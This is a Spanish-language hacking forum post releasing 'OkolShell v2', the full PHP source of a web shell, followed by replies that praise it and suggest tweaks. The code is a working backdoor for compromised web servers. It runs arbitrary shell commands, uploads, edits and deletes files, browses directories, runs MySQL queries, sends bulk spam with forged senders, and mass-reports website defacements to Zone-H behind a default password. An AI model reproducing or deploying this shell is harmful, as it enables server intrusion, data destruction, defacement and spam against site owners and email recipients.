Hola amigos, ahora les vengo anunciando la V2 de la OkolShell, Dispone de nuevas mejoras.
¿Cuales son?
-Bug Fixes.
-Adición de un panel de administración.
-Navegación de directorios.
-Un Diseño más amigable y ordenado.
Decidí quitar el safe mode bypass ya que la mayoría sabe bypassearlo.
Cualquier asunto por MP.
Les dejo unas fotos:
(http://i.imgur.com/xmI4Vyh.png)
(http://i.imgur.com/caOz7VA.png)
*La contraseña por defecto es: pass.
Source:
<?php
session_start();
?>
<style type="text/css">
table {
border-collapse: collapse;
border: 1px solid #03476F;
font: normal 11px verdana, arial, helvetica, sans-serif;
color: #363636;
background: #92C428;
}
caption {
text-align: center;
font: bold 18px arial, helvetica, sans-serif;
background: transparent;
padding:6px 4px 8px 0px;
color: #03476F;
text-transform: uppercase;
}
td, th {
border: 1px dotted #03476F;
padding: .4em;
color: #363636;
}
thead th, tfoot th {
font: bold 11px verdana, arial, helvetica, sans-serif;
border: 1px solid #03476F;;
text-align: left;
background: #4591AD;
color: #FFFFFF;
padding-top:3px;
}
tbody td a {
background: transparent;
text-decoration: none;
color: #363636;
}
tbody td a:hover {
background: #C2F64D;
color: #363636;
}
tbody th a {
font: normal 11px verdana, arial, helvetica, sans-serif;
background: transparent;
text-decoration: none;
font-weight:normal;
color: #363636;
}
tbody th a:hover {
background: transparent;
color: #363636;
}
tbody th, tbody td {
vertical-align: top;
text-align: left;
}
tfoot td {
border: 1px solid #03476F;
background: #4591AD;
padding-top:3px;
color: #FFFFFF;
}
.odd {
background: #AEE239;
}
tbody tr:hover {
background: #FFD800;
border: 1px solid #03476F;
color: #FFFFFF;
}
tbody tr:hover th,
tbody tr.odd:hover th {
background: #FFD800;
color: #FFFFFF;
}
input, textarea { background-color: #000; color: #0F0; padding: 5px; font-size: 15px; }
</style>
<body bgcolor="Black" Text="green" alink="green" blink="green" link="green">
<title>OkolShell v2</title>
<center><pre style="color: green; text-shadow: 0px 0px 8px yellow;">
<big>
________ __ .__ _________.__ .__ .__ ________
\_____ \ | | ______ | | / _____/| |__ ____ | | | | ___ _\_____ \
/ | \| |/ / _ \| | \_____ \ | | \_/ __ \| | | | \ \/ // ____/
/ | \ < <_> ) |__/ \| Y \ ___/| |_| |__ \ // \
\_______ /__|_ \____/|____/_______ /|___| /\___ >____/____/ \_/ \_______ \
\/ \/ \/ \/ \/ \/
<?php echo "<font size='2'>".shell_exec('uname -a');
echo '<font size="2" color="red">usuario </font><font size="2">'. shell_exec('id');
echo '<font size="2" color="red">PHP Version </font><font size="2">'. phpversion().'<br>';
echo '<font size="2" color="red">Safe Mode </font><font size="2" color="gray">'. $safe_mode = @ini_get("safe_mode")?'<font color="red">ON</font>':'<font color="green">OFF</font>'; $safe_mode;
echo '</pre><tr></tr>';
?>
</pre></center><br /><br /></big></span>
<center>
<?php
@set_magic_quotes_runtime(0);
if(@$_SESSION['okol'] != 'logged'){
if(isset($_POST['asdd']) && $_POST['asd'] == 'pass'){
$_SESSION['okol'] = 'logged';
echo '<script>window.location="?";</script>';
}
?>
<form action="" method="POST">
<input type="pass" name="asd" />
<input type="submit" name="asdd" value="Logear" style="color: green; text-shadow: 0px 0px 8px yellow;"/>
</form>
<?php
die();
}
$sec = @$_GET['sec'];
if($sec == 'mail'){
?>
<h3>Mailer</h3>
<form method="post" action="">
Desde:<input type="text"name="from"><br /><br />
Asunto<input type="text"name="asunto"><br /><br />
Numero De Mensajes<input type="text"name="num"><br /><br />
Para:<textarea name="para"></textarea><br>
[*]Si son varios mails separalos por coma...<br><br />
Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
<center><input type="submit" value="Spam!" name="spam"><br /></center>
</form>
<?php
if(isset($_POST['spam'])){
$desde = $_POST['from'];
$para= $_POST['para'];
$cont= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
$lol=$lol + 1;
mail($para,$asunto,$cont,'From:'.$desde);
}
if(mail($para,$asunto,$cont,'From:'.$desde))
{
echo'<>Enviado Correctamente!<br>';
}else{
echo '<center>No se pudo enviar el mensaje<br>';
}
}
}elseif ($sec == 'reportzone') {
?>
<h3>Zone-H Reporter</h3>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
nick: <br><input type="text" name="nick"><br>
<input type="submit" value="Reportar">
</form>
<?php
if(isset($_POST['report']))
{
@$defacer = htmlentities($_POST['nick']);
@$url = htmlentities($_POST['report']);
@$url2 = htmlentities($_POST['report1']);
@$url3 = htmlentities($_POST['report2']);
@$url4 = htmlentities($_POST['report3']);
@$url5 = htmlentities($_POST['report4']);
@$url6 = htmlentities($_POST['report5']);
@$url7 = htmlentities($_POST['report6']);
@$url8 = htmlentities($_POST['report7']);
@$url9 = htmlentities($_POST['report8']);
@$url10 = htmlentities($_POST['report9']);
function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
{
$ch = curl_init("http://zone-h.com/notify/mass");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
curl_exec($ch);
curl_close($ch);
}
ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
}
}elseif ($sec == 'ejec') {
?>
<form method="POST" action="">
<h3>Comando a ejecutar</h3><br />
<input type="text" name="ejec"><br />
<input type="submit" value="Ejecutar"><br />
</form>
<?php
echo '<textarea cols="70" rows="10">';
echo @shell_exec($_POST['ejec']);
echo '</textarea>';
}elseif ($sec == 'crypt') {
?>
<h3>Cifrar y Descifrar</h3>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a Desencriptar:<br>
<input type="text" name="decript64"><br>
<input type="submit" value="Desencriptar">
</form>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a encriptar:<br>
<input type="text" name="encript64"><br>
<input type="submit" value="Encriptar"><br /><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
Encriptar en MD5<br />
<input type="text" name="md5en">
<input type="submit" value="encriptar"><br>
</form>
<?php
#encript b64
function base64en(){
$encript = base64_encode($_POST['encript64']);
echo $encript.'<br>';
}
#Decript b64
function base64de(){
$decript = base64_decode($_POST['decript64']);
echo $decript.'<br>';
}
#encript Md5
function md5encript(){
$encriptmd5 = md5($_POST['md5en']);
echo $encriptmd5.'<br>';
}
if(isset($_POST['encript64'])){
base64en();
}
if(isset($_POST['decript64'])){
base64de();
}
if(isset($_POST['md5en'])){
md5encript();
}
}elseif ($sec == 'mysqlsen') {
?>
<form method="POST" action="">
<h3>Sentencias Mysql</h3><br>
Host:<input type="text" name="host">
User:<input type="text" name="user">
Password:<input type="text" name="password"><br>
DB:<input type="text" name="database">
Query: <input type="text" name="query">
<input type="submit" value="Ejecutar" name="mysqlsentencia">
</form>
<?php
if(isset($_POST['query'])){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['password'];
$query = $_POST['query'];
$db = $_POST['database'];
$con = mysql_connect($host, $user, $pass);
echo mysql_error()?"Error: " . mysql_error():"Conectado con exito\n";
mysql_select_db($db, $con);
echo mysql_error()?"Error: " . mysql_error():"DB seleccionada con exito\n\n";
$resultado = mysql_query($query);
if($result)
{
while($line = mysql_fetch_array($result,MYSQL_ASSOC))
{
print_r ($line);
}
}
}
}
?>
<a href="?sec=mail">Mailer</a><br>
<a href="?sec=reportzone">Zone-H Reporter</a><br>
<a href="?sec=ejec">Ejecutar comandos</a><br>
<a href="?sec=crypt">Zone Crypter (Md5 y Base64)</a><br>
<a href="?sec=mysqlsen">Mysql Sentences</a><br>
<form action="" method="post" enctype="multipart/form-data">
<h3 style="color: green; text-shadow: 0px 0px 2px green;">Enviar un nuevo archivo: </h3>
<br>
<input name="banner" type="file">
<br>
<input type="submit" value="Enviar" name="subir">
</form>
<?php
if(isset($_GET['del']) & @$_GET['file'] != ""){
unlink($_GET['file']);
echo '<script>window.location="?";</script>';
}
if(isset($_POST['subir'])){
$path= $_GET['dir'];
$nombreArch=$_FILES['banner']['name'];
if (is_uploaded_file($_FILES['banner']['tmp_name']))
{
move_uploaded_file($_FILES['banner']['tmp_name'], $path."/".$nombreArch);
echo "El archivo se ha subido correctamente al servidor, muchas gracias <p>";
}
else {
echo "Error al subir el archivo ";
echo $path."/".$archivo."";
}
}
if($sec = 'menu'){
@$file = htmlentities($_GET['file']);
@$sec = $_GET['sec'];
}
$directorio = isset($_GET['dir'])?$_GET['dir']:"/";
function permisos($permiso){
//Sacado de php.net :)
$permisos = @fileperms($permiso);
if (($permisos & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($permisos & 0xA000) == 0xA000) {
// Enlace Simbólico
$info = 'l';
} elseif (($permisos & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($permisos & 0x6000) == 0x6000) {
// Especial Bloque
$info = 'b';
} elseif (($permisos & 0x4000) == 0x4000) {
// Directorio
$info = 'd';
} elseif (($permisos & 0x2000) == 0x2000) {
// Especial Carácter
$info = 'c';
} elseif (($permisos & 0x1000) == 0x1000) {
// TuberÃa FIFO
$info = 'p';
} else {
// Desconocido
$info = 'u';
}
// Propietario
$info .= (($permisos & 0x0100) ? 'r' : '-');
$info .= (($permisos & 0x0080) ? 'w' : '-');
$info .= (($permisos & 0x0040) ?
(($permisos & 0x0800) ? 's' : 'x' ) :
(($permisos & 0x0800) ? 'S' : '-'));
// Grupo
$info .= (($permisos & 0x0020) ? 'r' : '-');
$info .= (($permisos & 0x0010) ? 'w' : '-');
$info .= (($permisos & 0x0008) ?
(($permisos & 0x0400) ? 's' : 'x' ) :
(($permisos & 0x0400) ? 'S' : '-'));
// Mundo
$info .= (($permisos & 0x0004) ? 'r' : '-');
$info .= (($permisos & 0x0002) ? 'w' : '-');
$info .= (($permisos & 0x0001) ?
(($permisos & 0x0200) ? 't' : 'x' ) :
(($permisos & 0x0200) ? 'T' : '-'));
return $info;
}
if($file == ""){
echo '<table border="1"> <tr> <th ><font color="gray">archivos</font></th>';
echo '<th><font color="gray">Tamaño</th></font>';
echo '<th><font color="gray">Tipo</th></font>';
echo '<th><font color="gray">Permisos</th></tr></font>';
$files = @scandir($directorio) or die('No existe el directorio que buscas');
for ($i=0; $i < count($files); $i++) {
if($files[$i] != "." && $files[$i] != ".."){
$cat = is_file($directorio."/".$files[$i])?"file":"dir";
chdir($directorio);
echo "<tr><td><a href='?".$cat."=" .$directorio."/".$files[$i]."''>".$files[$i]."</a></td>";
echo '<td>'. @filesize($files[$i]).' KB</td>';
echo '<td>'. @filetype($files[$i]).'</td>';
echo '<td>'. permisos($files[$i]).'</td>';
echo "<td><a href='?del&file=$directorio/$files[$i]'>Eliminar</a></td></tr>";
}
}
echo '</table>';
echo '<form method="GET" action=""> ';
echo '<input type="text" name="dir" value="'.$_SERVER['DOCUMENT_ROOT'].'"> ';
echo '<input type="Submit" value="navegar"> ';
echo '<td>';
if(isset($_GET['dela']) && $_GET['dela'] != ''){
chdir($directorio);
unlink($archel);
}
}else{
if(isset($_POST['enviar'])){
$fp=fopen("$file", "w+");
fputs($fp, $_POST['contenido']);
@fclose($fp);
echo 'Editado';
}
if(is_file($file))
{
$fp = @fopen("$file", 'r');
$cont = @fread($fp, filesize($file))or die('No se puede editar.');
$cont = $cont;
@fclose($fp);
echo "<form action='' method='POST'> ";
echo "<textarea name='contenido' cols= '60' rows='20'>".htmlentities($cont)."</textarea><br> ";
echo "<input type='submit' value='Editar' name='enviar'><br> ";
echo "</form>";
echo '<button onClick="history.go(-1)">Atras</button>';
}
}
?>
</form>
<h3 color="green">Crear archivo:</h3><br><br>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
Nombre del archivo<br />
<input type="text" name="archivo"><br /><br>
Codigo<br />
<textarea name="contenido2" cols="60" rows="15"></textarea><br />
<input type="submit" value="crear" name="Mod"><br />
</form>
<?php
if(isset($_POST['archivo'])){
$contenido = $_POST['contenido2'];
$nombre = $_POST['archivo'];
$crear = @fopen($nombre,'w+');
@fwrite($crear, $contenido);
@fclose($crear);
echo 'El archivo se ha creado correctamente.';
}
?>
</center>
Saludos.
Special Greetz: artshu | Kid_Goth.
ya con solo ver el titulo te dan ganas de entrar a ver el post,
un aportazo! como todos tus aportes, se agradece.
saludos!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
ya con solo ver el titulo te dan ganas de entrar a ver el post,
un aportazo! como todos tus aportes, se agradece.
saludos!
Un gustazo verte de nuevo por acá mi hermano.
Un saludo y un abrazo muy grande.
Saludos.
gracias por traerla :D nice diseño :D
Muy buena Okol, va avanzando. Me agrada mucho el diseño ;)
Te quedo linda Okol :)
>.< lol
salu2
felicitaciones Okol! un gran Aporte! quiero ver las proximas versiones!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
>.< lol
salu2
Blood_rec, aca estamos para compartir lo que sabemos.. No para reirnos de los demas.
Excelente aporte Okol! segui asi!
Wow Okol muy excelente amigo lo probaré gracias por Compartirlo :D
Impresionante el aporte :D
Me gustaría decir un par de cosillas:
- Sería mejor si se cambia:
109 <input type="pass" name="asd" />
por:
109 <input type="password" name="asd" />
así no se vería la contraseña cuando la escribes.
- También me gustaría decir que para los que quieran cambiar la contraseña y no sepan (cosa dificil de no saber xD) es así:
102 if(isset($_POST['asdd']) && $_POST['asd'] == 'poneraquilacontraseñaquequieres'){
Bueno, espero haber ayudado a alguien con esto ;)
Un Saludo y gracias de nuevo por este aporte!